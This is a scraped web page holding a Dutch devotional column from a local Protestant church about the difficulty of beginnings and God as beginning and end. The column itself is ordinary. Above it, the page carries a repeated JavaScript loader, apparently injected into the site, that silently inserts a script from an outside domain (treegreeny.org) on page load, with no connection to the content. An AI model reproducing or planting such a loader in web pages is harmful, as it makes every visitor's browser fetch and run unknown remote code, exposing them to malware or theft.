;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Alle begin is moeilijk ! - PKN Damwâld

Alle begin is moeilijk !

Gepubliceerd op: vrijdag 30 september 2016

Herkent u het? Zenuwen? Spanning? Of voelt u zich juist energiek, vol spirit? Hoopvol? Vol verwachting? Of sluipt er dan bij u ook altijd iets in van faalangst of onzekerheid? Ja, alle begin is moeilijk.
Columnschrijver worden is één, maar een column schrijven is twee … Zeker als je, zoals bij mij het geval is, als startende’ nono’ de druk om te presteren alsmaar voelt toenemen bij die alsmaar naderende en naderende ‘deadline’. Gek genoeg flitst er steeds niets anders door m’n hoofd dan al die ‘juweeltjes’ van die andere, die échte columnschrijvers. Niet goed natuurlijk … maar zo kun je bij de start toch ook al weer smachten naar het einde van je carrière(- in de dop) …
Inderdaad: alle begin is moeilijk. Goed, ik weet dat ik niet zomaar ergens aan begin. Maar toch, het gaat om een ‘klus’ waar ik geen ervaring mee heb. Hoe kom je op gang? Waar moet je stoppen ! Wat zijn de valkuilen en wat zijn de do’s en wat zijn de don’ts. En waarom zou de Chinese wijsgeer Confucius anders ooit gefilosofeerd hebben ‘Bij een goed einde hoort een goed begin’. Gelukkig zijn er altijd dingen die je de juiste inspiratie blijken te geven.
Neem nu de Bijbel vanaf pagina 1. De Here God is hét begin, de Alpha. Hij is er bij … altijd ! Hij is er als jij begint aan je dag, als je druk bent op je werk, of bij de start van je schooldag, de vergadering van de kerk of als je, zoals bij mij het geval, een column wilt schrijven. Of neem het gedicht van Huub Oosterhuis eens in je op: ‘Niemand weet wat leven is, alleen dat het gegeven is en dat van dit geheimenis God het begin en einde is’. Of zing eens voluit gezang 1 van het Liedboek van de Kerken: ‘God staat aan het begin. En Hij komt aan het einde. Zijn woord is van het zijnde oorsprong en doel en zin.’ De Here is er dus niet alleen aan het begin, maar is er ook aan het einde! Sterker nog: Hij is hét einde, de laatste, de Omega. God is licht, is leven, de Schepper, de goede Herder, de Verlosser. Hij die is, die was en die komt!
Bij een goed einde hoort een goed begin? Gods goede begin is het hele werk! En God maakt zijn werk af! Dat kun je van óns werk lang niet altijd zeggen. God geeft altijd een nieuw begin, ook waar dat niet of niet meer leek te kunnen. Hij heeft niet voor niets een begin gemaakt met deze wereld en met Zijn werk in ons leven. En als de Here in je leven aan het begin én aan het einde én ergens daartussenin mag staan, dan heeft Hij een geweldige toekomst voor je in petto. Om opnieuw te beginnen, zonder einde. En dát te weten mag rust en vertrouwen geven in ons leven van elke dag, hoe die weg ook mag verlopen.

Columnist:Kees

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns